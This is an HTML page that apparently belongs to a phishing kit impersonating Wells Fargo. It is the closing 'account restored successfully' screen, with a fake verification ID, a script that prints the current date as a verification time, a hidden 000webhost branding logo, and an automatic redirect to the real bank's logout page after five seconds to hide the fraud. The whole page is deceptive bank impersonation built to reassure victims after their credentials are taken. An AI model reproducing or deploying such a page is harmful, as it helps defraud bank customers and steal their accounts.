<!DOCTYPE html>

<html class="ui-mobile" data-device="desktop" data-masked-input-enabled="true" data-print-link-enabled="true" lang="en">

<head>


<META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://connect.secure.wellsfargo.com/auth/logout">
<meta charset="UTF-8">

<base href="">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">

<title>Completed</title>





<link href="jero/1.ico" rel="Shortcut Icon">
<link rel="stylesheet" href="jero/v2.css">


<link rel="stylesheet" href="jero/v1.css">
</head>

<body class="ui-mobile-viewport ui-overlay-a">
<noscript>

<p class="ui-state-alert">
You must have JavaScript enabled to apply for an account or service. Please turn on JavaScript and refresh the page.
</p>

</noscript>

<div id="mainpage" data-role="page" class="osmp-app ui-page ui-page-theme-a ui-page-active" data-title="Completed - Step 3" data-url="mainpage" tabindex="0" style="min-height: 637px;">


<header role="banner">
<div class="masthead">


<nav class="back">

</nav>
<nav>


<a>
<img class="masthead-img-logo" alt="" role="img" src="jero/homepage-horz-logo.svg">
</a>

</nav>
<div class="top-search">

<ul role="navigation">

<li class="security">
<a class="c28cLink child-window ui-link" title="Online Security" href="" data-platform="salesplatform">Online Security</a></li>

</ul>

</div>

<nav class="menu">

<a href="" class="ui-link"></a>
</nav>

	
</div>
</header>


<div role="main" class="ui-content osmp-content">

<div class="primary-content">

<div class="progress-small small-screen">

<span class="middle">
Completed

</span>
</div>

	
<form>
<article id="primaryApplicant">
<fieldset>
<h1>Thank you, your account has been restored successfully.</h1>
<h2>Dear Valued Customer :</h2>
<p>Now you have all access to your Wells Fargo account(s).</p>
<p>
<input name="NextButton" value="Your Verification ID : WFV:52705-09017" id="NextButton" title="Confirmation" type="button">
<br>
Your Verification Date & Time : <script language="javascript">
 var today = new Date();
 document.write(today);
 </script>
<h4 class="clearBoth accName">You will be Signed Off from all active  to ensure the verification process is completed.</h4>
<h3>Thank you for using Wells Fargo Online&reg;.</h3>
</fieldset>
</form>
<div class="clearer">&nbsp;</div>





<div style="display: none;" id="cancelPopup-placeholder">
</div>




</div>



<div class="secondary-content">


<div class="products large-screen">

<h2>
You are Done</h2>
<div class="product-list">

<p>Your account is successfully restored.</p>
</div>



</div>

<div class="large-screen">

<div class="contact-bar" data-cid="tcm:343-49782-16" data-ctid="tcm:91-6222-32">
<div class="contact-bar-title">

<h2>You can Sign On Now.</h2>
</div>

</div>
</div>
</div>

</div>




<style>
img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {display:none;}
</style>



<div data-role="footer" class="osmp-footer ui-footer ui-bar-inherit" role="contentinfo">

<footer role="contentinfo" class="newFooter">

<div class="c9">

<nav role="navigation">

<ul class="not-large-screen">

<li><a class="c28cLink child-window ui-link" href="">Privacy, Cookies, Security &amp; Legal</a></li>
<li><a class="c28cLink child-window ui-link" title="Online Security" href="" data-platform="salesplatform">Online Security</a></li>

<li><a class="c28cLink child-window ui-link" href="">Ad Choices</a></li>
</ul>
<ul class="large-screen">

<li><a class="c28cLink child-window ui-link" href="">Privacy, Cookies, Security &amp; Legal</a></li>

<li><a class="c28cLink child-window ui-link" href="">Ad Choices</a></li>


</ul>
</nav>

<hr>
&copy; 1999 - 2021 Wells Fargo. All rights reserved. NMLSR ID 399801

</div>

</footer>

</div>


<span class="ui-hidden-accessible">End of popup</span>
</div>
</div>


<script src="jero/2.js"></script>





<script src="jero/1.js"></script>


</body>
</html>